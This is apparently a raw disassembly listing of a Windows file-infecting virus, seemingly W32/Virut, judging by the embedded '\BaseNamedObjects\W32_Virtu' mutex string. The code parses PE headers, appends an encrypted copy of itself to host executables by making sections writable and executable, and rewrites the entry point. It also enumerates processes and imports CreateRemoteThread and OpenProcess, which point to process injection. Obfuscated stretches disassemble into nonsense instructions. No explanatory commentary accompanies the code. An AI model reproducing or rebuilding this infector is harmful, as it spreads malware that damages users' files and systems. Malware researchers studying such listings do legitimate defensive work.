; UPX2:3144C4C7�j
lodsb
cmp al, 61h
jb short loc_3144C4BC
cmp al, 7Ah
ja short loc_3144C4BC
sub al, 20h
loc_3144C4BC: ; CODE XREF: UPX2:3144C4B4�j
; UPX2:3144C4B8�j
stosb
cmp al, 5Ch
jz short loc_3144C4AD
cmp al, 2Eh
jz short loc_3144C4A2
cmp al, 0
jnz short loc_3144C4B1
jecxz short locret_3144C494
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3144C4DF
cmp eax, 524353h
jnz locret_3144C412
loc_3144C4DF: ; CODE XREF: UPX2:3144C4D2�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3144C412
cmp eax, 4E554357h
jz locret_3144C412
cmp eax, 32334357h
jz locret_3144C412
cmp eax, 4F545350h
jz locret_3144C412
xor ebx, ebx
call sub_3144C341
jnz short loc_3144C526
call sub_3144C215
call sub_3144C341
jz locret_3144C412
loc_3144C526: ; CODE XREF: UPX2:3144C514�j
xor edx, edx
call sub_3144C543
call sub_3144C495
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_3144C93D
; =============== S U B R O U T I N E =======================================
sub_3144C543 proc near ; CODE XREF: UPX2:3144C528�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3144C93D
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3144C93D
test dword ptr [ebx+16h], 2000h
jnz loc_3144C93D
test byte ptr [ebx+5Ch], 2
jz loc_3144C93D
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_3144C93D
cmp eax, 20202020h
jz loc_3144C93D
mov ecx, [ebx+0C8h]
jecxz short loc_3144C5B8
push ecx
call sub_3144B4FC
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_3144C5B8: ; CODE XREF: sub_3144C543+5D�j
call sub_3144C458
jb loc_3144C93D
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_3144C5D8
xor eax, eax
jmp short loc_3144C5DD
; ---------------------------------------------------------------------------
loc_3144C5D8: ; CODE XREF: sub_3144C543+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_3144C5DD: ; CODE XREF: sub_3144C543+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_3144AC38+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_3144C5FF: ; CODE XREF: sub_3144C543+D5�j
push 20h
dec cl
pop eax
js short loc_3144C61A
call near ptr dword_3144AC38+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_3144C5FF
; ---------------------------------------------------------------------------
loc_3144C61A: ; CODE XREF: sub_3144C543+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_3144C648
test dword ptr [ebp+1039C0h], 3
jnz short loc_3144C63E
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_3144C648
; ---------------------------------------------------------------------------
loc_3144C63E: ; CODE XREF: sub_3144C543+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_3144C648: ; CODE XREF: sub_3144C543+E1�j
; sub_3144C543+F9�j ...
push 6
pop ecx
loc_3144C64E: ; CODE XREF: sub_3144C543+129�j
push 6
pop eax
call near ptr dword_3144AC38+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_3144C64E
test dword ptr [ebp+1039C0h], 8
jnz short loc_3144C683
cmp byte ptr [ebp+1039BAh], 1
jz short loc_3144C648
loc_3144C683: ; CODE XREF: sub_3144C543+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3144C6AA
cmp byte ptr [ebp+1039B8h], 5
jz short loc_3144C648
cmp byte ptr [ebp+1039B9h], 5
jz short loc_3144C648
cmp byte ptr [ebp+1039BAh], 5
jz short loc_3144C648
loc_3144C6AA: ; CODE XREF: sub_3144C543+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_3144C6BF
cmp byte ptr [ebp+1039B8h], 2
ja short loc_3144C648
loc_3144C6BF: ; CODE XREF: sub_3144C543+171�j
and dword ptr [ebp+104300h], 0
call loc_3144B93D
call loc_3144C413
call sub_3144C946
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_3144C341
jz loc_3144C93D
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3144C458
jb loc_3144C93D
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_3144C733
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_3144C733: ; CODE XREF: sub_3144C543+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_3144C747
rep movsb
loc_3144C747: ; CODE XREF: sub_3144C543+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_3144C805
push dword ptr [ebx+28h]
call sub_3144B4FC
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_3144C805
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3144C784
xor ecx, ecx
loc_3144C784: ; CODE XREF: sub_3144C543+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_3144C7EB
mov edi, [esp+14h+var_14]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_3144C7C4
neg dword ptr [eax]
loc_3144C7C4: ; CODE XREF: sub_3144C543+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_3144C7E2
neg dword ptr [eax]
loc_3144C7E2: ; CODE XREF: sub_3144C543+29B�j
push ecx
call loc_3144C413
pop ecx
jmp short loc_3144C7F7
; ---------------------------------------------------------------------------
loc_3144C7EB: ; CODE XREF: sub_3144C543+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3144C7F7: ; CODE XREF: sub_3144C543+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_3144C805: ; CODE XREF: sub_3144C543+20E�j
; sub_3144C543+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_3144C81E
imul edx, 12345678h
loc_3144C81E: ; CODE XREF: sub_3144C543+2D3�j
mov [eax-19h], dx
call sub_3144A208
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_3144C850
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_3144C850: ; CODE XREF: sub_3144C543+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_3144C86C
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_3144C86C: ; CODE XREF: sub_3144C543+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_3144C87F
push edx
call sub_3144BFD9
pop edx
loc_3144C87F: ; CODE XREF: sub_3144C543+333�j
mov ecx, [ebp+104300h]
jecxz short loc_3144C88C
mov [ebx+28h], ecx
jmp short loc_3144C899
; ---------------------------------------------------------------------------
loc_3144C88C: ; CODE XREF: sub_3144C543+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_3144C896
jmp short loc_3144C899
; ---------------------------------------------------------------------------
loc_3144C896: ; CODE XREF: sub_3144C543+34F�j
mov ecx, [ebx+28h]
loc_3144C899: ; CODE XREF: sub_3144C543+347�j
; sub_3144C543+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_3144C8B9
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_3144C8B9: ; CODE XREF: sub_3144C543+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_3144C8CA
mov [edx+8], ecx
loc_3144C8CA: ; CODE XREF: sub_3144C543+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_3144C8FB
add ecx, [ebp+101069h]
loc_3144C8FB: ; CODE XREF: sub_3144C543+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_3144C91D
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_3144C91D
mov dh, [ebp+1039BFh]
loc_3144C91D: ; CODE XREF: sub_3144C543+3C4�j
; sub_3144C543+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_3144C934
loc_3144C929: ; CODE XREF: sub_3144C543+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3144C929
jmp short loc_3144C93D
; ---------------------------------------------------------------------------
loc_3144C934: ; CODE XREF: sub_3144C543+3E4�j
; sub_3144C543+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3144C934
loc_3144C93D: ; CODE XREF: UPX2:3144C53E�j
; sub_3144C543+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3144C543 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144C946 proc near ; CODE XREF: sub_3144C543+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_3144C412
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_3144C95F: ; CODE XREF: sub_3144C341+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_3144C987: ; CODE XREF: sub_3144C341+6B�j
; sub_3144C341+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_3144C993: ; CODE XREF: sub_3144C341+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_3144C946 endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 0DB81234h
dd 6003694Dh, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 36946DFh
dd 8FB8B1EBh, 0E803694Ch, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 2030607h, 0E3050501h
dd 0DFB067CDh, 119415FFh, 0FF8B0100h, 53h dup(0)
db 90h
; ---------------------------------------------------------------------------
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_3144CC4C
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_3144CC43
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_3144CC4B
; ---------------------------------------------------------------------------
loc_3144CC43: ; CODE XREF: UPX2:3144CC34�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_3144CC4B: ; CODE XREF: UPX2:3144CC41�j
pop ebx
loc_3144CC4C: ; CODE XREF: UPX2:3144CC1D�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 2C06h
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+40343Ch]
mov ecx, 6Fh
rep movsb
loc_3144CC73: ; CODE XREF: UPX2:3144CC8F�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_3144CC89
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_3144CC91
loc_3144CC89: ; CODE XREF: UPX2:3144CC7A�j
sub ebx, 100h
jnz short loc_3144CC73
loc_3144CC91: ; CODE XREF: UPX2:3144CC87�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_3144CC9F: ; CODE XREF: UPX2:loc_3144CCC6�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_3144CCC6
cmp dword ptr [eax+3], 636F7250h
jnz short loc_3144CCC6
cmp dword ptr [eax+7], 72646441h
jnz short loc_3144CCC6
cmp dword ptr [eax+0Bh], 737365h
jz short loc_3144CCCB
loc_3144CCC6: ; CODE XREF: UPX2:3144CCA9�j
; UPX2:3144CCB2�j ...
loop loc_3144CC9F
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_3144CCCB: ; CODE XREF: UPX2:3144CCC4�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_3144CCF1+2
inc ebx
insb
outsd
jnb short near ptr loc_3144CD4F+2
dec eax
popa
outsb
db 64h
insb
loc_3144CCF1: ; CODE XREF: UPX2:3144CCE2�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_3144CD0D+1
inc ebx
jb short near ptr loc_3144CD68+1
popa
jz short near ptr loc_3144CD68+4
inc ebp
jbe short near ptr loc_3144CD6E+1
outsb
jz short near ptr loc_3144CD4C+2
loc_3144CD0D: ; CODE XREF: UPX2:3144CCFC�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_3144CD29
inc edi
db 65h
jz short near ptr loc_3144CD68+4
popa
jnb short loc_3144CD97
inc ebp
jb short near ptr loc_3144CD97+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_3144CD29 proc near ; CODE XREF: UPX2:3144CD17�p
var_1B0 = dword ptr -1B0h
var_188 = dword ptr -188h
var_180 = dword ptr -180h
var_88 = byte ptr -88h
var_39 = byte ptr -39h
var_15 = byte ptr -15h
var_B = byte ptr -0Bh
var_4 = dword ptr -4
; FUNCTION CHUNK AT 3144CDD2 SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 3144CEF7 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 3144CEFC SIZE 00000003 BYTES
; FUNCTION CHUNK AT 3144CF12 SIZE 000000E5 BYTES
; FUNCTION CHUNK AT 3144D006 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 3144D03F SIZE 0000001C BYTES
; FUNCTION CHUNK AT 3144D068 SIZE 00000109 BYTES
push ebx
call esi ; lstrcatA
mov [ebp+403544h], eax
call sub_3144CDA7
test eax, eax
jz short loc_3144CD5C
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_3144CD56
lea eax, [ebp+4011D2h]
loc_3144CD4C: ; CODE XREF: UPX2:3144CD0B�j
mov dl, [eax-1]
loc_3144CD4F: ; CODE XREF: UPX2:3144CCEA�j
call sub_3144CDC2
jmp short loc_3144CDD2
; ---------------------------------------------------------------------------
loc_3144CD56: ; CODE XREF: sub_3144CD29+1B�j
; sub_3144CD29+136�j ...
call dword ptr [ebp+40353Ch]
loc_3144CD5C: ; CODE XREF: sub_3144CD29+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_3144CD86
loc_3144CD68: ; CODE XREF: UPX2:3144CD02�j
; UPX2:3144CD05�j ...
lea esi, [ebp+403435h]
loc_3144CD6E: ; CODE XREF: UPX2:3144CD08�j
mov edi, [esp+8+var_4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_3144CD86: ; CODE XREF: sub_3144CD29+3D�j
pop ebp
retn
sub_3144CD29 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3144CD88: ; CODE XREF: sub_3144CDA7+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_3144CD97: ; CODE XREF: UPX2:3144CD21�j
; UPX2:3144CD24�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
db 0
; =============== S U B R O U T I N E =======================================
sub_3144CDA7 proc near ; CODE XREF: sub_3144CD29+9�p
; UPX2:loc_3144DA4C�p
xor ecx, ecx
call loc_3144CD88
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_3144CDA7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144CDC2 proc near ; CODE XREF: sub_3144CD29:loc_3144CD4F�p
; sub_3144EB96+25B�p
mov dh, dl
mov ecx, 225Fh
loc_3144CDC9: ; CODE XREF: sub_3144CDC2+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_3144CDC9
retn
sub_3144CDC2 endp
; ---------------------------------------------------------------------------
movsb
; START OF FUNCTION CHUNK FOR sub_3144CD29
loc_3144CDD2: ; CODE XREF: sub_3144CD29+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_3144CDF9: ; CODE XREF: sub_3144CD29+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_3144CDF9
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, [ebp+4015BBh]
xor ecx, ecx
lea edi, [ebp+403558h]
mov cl, 1Eh
call sub_3144D18C
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_3144CF12
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+403550h], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_3144CD56
xchg eax, edi
lea esi, [ebp+401000h]
mov ebp, edi
mov ecx, 0A74h
sub ebp, 401000h
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_3144CD29
; ---------------------------------------------------------------------------
db 83h
dd 0FC8B20ECh, 0C033086Ah, 3D958D59h, 0F300401Ah, 89FC8BABh
dd 47FE1057h, 368571Ch, 0FF000100h, 40355095h, 20C48300h
dd 840FC085h, 0FFFFFEA2h, 6A006A97h, 4006801h, 688000h
dd 0FF000100h, 40355095h, 0FC08500h, 0FFFE8584h, 50006AFFh
dd 4000068h, 0C1006A00h, 6A570CE8h, 1685001h, 0FF000100h
dd 40355095h, 0A6800h, 95FF0001h
db 50h, 35h, 40h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144CD29
loc_3144CEF7: ; CODE XREF: sub_3144CD29+22C�j
add al, ch
; END OF FUNCTION CHUNK FOR sub_3144CD29
; ---------------------------------------------------------------------------
db 5, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144CD29
loc_3144CEFC: ; CODE XREF: sub_3144CD29+224�j
add cl, ch
push esp
; END OF FUNCTION CHUNK FOR sub_3144CD29
; ---------------------------------------------------------------------------
db 0FEh
db 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_3144CF02 proc near ; CODE XREF: sub_3144CF02+D�j
; sub_3144CD29+428�p
push 1
pop ecx
jecxz short locret_3144CF11
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_3144CF02
; ---------------------------------------------------------------------------
locret_3144CF11: ; CODE XREF: sub_3144CF02+3�j
retn
sub_3144CF02 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144CD29
loc_3144CF12: ; CODE XREF: sub_3144CD29+10F�j
cmp dword ptr [ebp+403570h], 0
jz loc_3144CD56
call near ptr loc_3144CF29+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_3144CF29: ; CODE XREF: sub_3144CD29+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_3144CF46+5
inc eax
add [ebx], dh
leave
loc_3144CF38: ; CODE XREF: sub_3144CD29+26C�j
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_3144D18C
loc_3144CF46: ; CODE XREF: sub_3144CD29+209�j
cmp dword ptr [ebp-64B8CA08h], 0FFFFFF80h
jl short loc_3144CEFC
or [ebx-6EFCCE84h], al ; CODE XREF: sub_3144CD29+280�j
jl short loc_3144CEF7
lodsd
cmp byte ptr [eax+esi*2+1], 8Fh
test [ebp-49FFBFCDh], edx
mov ebp, 1A247C80h ; CODE XREF: sub_3144CD29+25C�j
cmp [esp+ebx*2+1Ch+var_88], 80h ; CODE XREF: sub_3144CD29+2BC�j
jl short near ptr loc_3144CFD5+1
and eax, [eax-7EFBD384h]
jl short near ptr loc_3144CFAB+3
push es
cmp dword ptr [edi+ecx+4Bh], 0C0587C86h ; CODE XREF: sub_3144CD29+278�j
cmp [esp+ebp*8+20h+var_39], 80h
jl short near ptr loc_3144CF63+2 ; CODE XREF: sub_3144CD29+2C8�j
stosd
cmp [esp+edi+20h+var_B], 81h
jl short loc_3144D006
or al, [ecx-7CE3BA84h]
jl short loc_3144CF38
mov dh, 80h
jl short near ptr loc_3144CF99+1
; CODE XREF: sub_3144CD29:loc_3144CF99�j
or [esi-7CA23584h], al
jl short near ptr loc_3144CF78+5
adc [ecx-7ED52184h], eax ; CODE XREF: sub_3144CD29+294�j
jl short near ptr loc_3144CF4F+1
loc_3144CFAB: ; CODE XREF: sub_3144CD29+24C�j
sbb eax, [edx-7FE28884h]
jl short loc_3144CFB8
mov ecx, 0BB767C80h
loc_3144CFB8: ; CODE XREF: sub_3144CD29+288�j
cmp byte ptr [ecx+9], 83h
jl short near ptr loc_3144CFA3+1
cmp eax, 3F587C86h
xchg bh, [edx+eax*4+27h]
cmp dword ptr [eax+edi*4+1Ch], 24427C83h
cmp [esp+ebx+20h+var_15], 81h
loc_3144CFD5: ; CODE XREF: sub_3144CD29+244�j
jl short loc_3144D04B
mov ecx, 9A517C80h ; CODE XREF: sub_3144CD29:loc_3144D04B�j
cmp byte ptr [edi+eax*4+0Dh], 81h
jl short loc_3144D043
aam 90h
jl short near ptr loc_3144CF68+1
setalc
nop
jl short loc_3144D03F
xlat
nop
jl short near ptr loc_3144D056+2
xlat
nop
jl short near ptr loc_3144CF85+1
xlat
nop
jl short $+2
; END OF FUNCTION CHUNK FOR sub_3144CD29
; ---------------------------------------------------------------------------
db 0
dd 0DC550000h, 0DCFD7C90h, 0DD907C90h
db 90h
db 7Ch
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144CD29
loc_3144D006: ; CODE XREF: sub_3144CD29+264�j
mov edx, 0B67C90DDh
ficom word ptr [eax-6F1FBA84h]
jl short near ptr loc_3144D043+2
jmp far ptr 7C91h:30C67C90h
; END OF FUNCTION CHUNK FOR sub_3144CD29
; ---------------------------------------------------------------------------
dw 5100h
dd 0FF50FF6Ah, 4035E495h, 85595F00h, 27840FFFh, 8DFFFFFDh
dd 401000B5h, 0A74B900h, 0EF8B0000h
db 0F3h, 0A5h, 81h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144CD29
loc_3144D03F: ; CODE XREF: sub_3144CD29+2C0�j
in eax, dx
add [eax], dl
inc eax
loc_3144D043: ; CODE XREF: sub_3144CD29+2B8�j
; sub_3144CD29+2E8�j
add [ebp+40144C85h], cl
add bh, bh
loc_3144D04B: ; CODE XREF: sub_3144CD29:loc_3144CFD5�j
loopne near ptr loc_3144CFD7+3
xchg eax, ebp
loopne loc_3144D068
inc eax
add [edx-1], dl
xchg eax, ebp
pushf
loc_3144D056: ; CODE XREF: sub_3144CD29+2C4�j
xor eax, 16E80040h
; END OF FUNCTION CHUNK FOR sub_3144CD29
; ---------------------------------------------------------------------------
db 0
dd 6F4C0000h, 70756B6Fh, 76697250h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144CD29
loc_3144D068: ; CODE XREF: sub_3144CD29+325�j
imul ebp, [ebp+67h], 6C615665h
jnz short near ptr loc_3144D0D5+2
inc ecx
add [eax-1], dl
xchg eax, ebp
dec eax
xor eax, 85890040h
dec esp
xor eax, 54500040h
push 20h
push 0FFFFFFFFh
call dword ptr [ebp+4035ECh]
test eax, eax
pop edi
jnz short loc_3144D0D1
xchg eax, esi
push 2
push esi
push esi
mov edx, esp
push 1
push edx
call near ptr loc_3144D0AE+4
push ebx
db 65h
inc esp
bound esi, gs:[ebp+67h]
push eax
jb short near ptr loc_3144D111+3
jbe short near ptr loc_3144D111+5
insb
loc_3144D0AE: ; CODE XREF: sub_3144CD29+373�p
db 65h
add gs:[bp-1], dl
xchg eax, ebp
dec esp
xor eax, 0C48B0040h
push esi
push esi
push esi
push eax
push esi
push edi
call dword ptr [ebp+4035D0h]
add esp, 10h
push edi
call dword ptr [ebp+40353Ch]
loc_3144D0D1: ; CODE XREF: sub_3144CD29+367�j
push 0
push 2
loc_3144D0D5: ; CODE XREF: sub_3144CD29+347�j
call dword ptr [ebp+403570h]
mov ecx, 128h
xchg eax, edi
sub esp, ecx
mov [esp+180h+var_180], ecx
push esp
push edi
call dword ptr [ebp+4035ACh]
xor esi, esi
and dword ptr [ebp+40363Ch], 0
loc_3144D0F7: ; CODE XREF: sub_3144CD29+3DE�j
; sub_3144CD29+3F0�j ...
push esp
push edi
call dword ptr [ebp+4035B0h]
test eax, eax
jz short loc_3144D15F
inc esi
cmp esi, 4
jb short loc_3144D0F7
push [esp+190h+var_188]
push 0
push 2Ah
loc_3144D111: ; CODE XREF: sub_3144CD29+380�j
; sub_3144CD29+382�j
call dword ptr [ebp+4035A8h]
test eax, eax
jz short loc_3144D0F7
xchg eax, ebx
call sub_3144D55E
xor ecx, ecx
xchg eax, ecx
jecxz short loc_3144D156
cmp [ebp+40363Ch], eax
jnz short loc_3144D156
add ecx, 0DAEh
push eax
push esp
push eax
push esi
push ecx
push eax
push eax
push ebx
call dword ptr [ebp+403568h]
test eax, eax
pop ecx
jz short loc_3144D156
push [esp+1B8h+var_1B0]
pop dword ptr [ebp+40363Ch]
call sub_3144CF02
loc_3144D156: ; CODE XREF: sub_3144CD29+3FB�j
; sub_3144CD29+403�j ...
push ebx
call dword ptr [ebp+40353Ch]
jmp short loc_3144D0F7
; ---------------------------------------------------------------------------
loc_3144D15F: ; CODE XREF: sub_3144CD29+3D8�j
add esp, 128h
push edi
call dword ptr [ebp+40353Ch]
jmp loc_3144CD56
; END OF FUNCTION CHUNK FOR sub_3144CD29
; ---------------------------------------------------------------------------
align 4
dd 585858h, 29CEh, 0D65h, 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_3144D18C proc near ; CODE XREF: sub_3144CD29+100�p
; sub_3144CD29+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_3144D197: ; CODE XREF: sub_3144D18C+E�j
lodsb
test al, al
jnz short loc_3144D197
loop sub_3144D18C
retn
sub_3144D18C endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
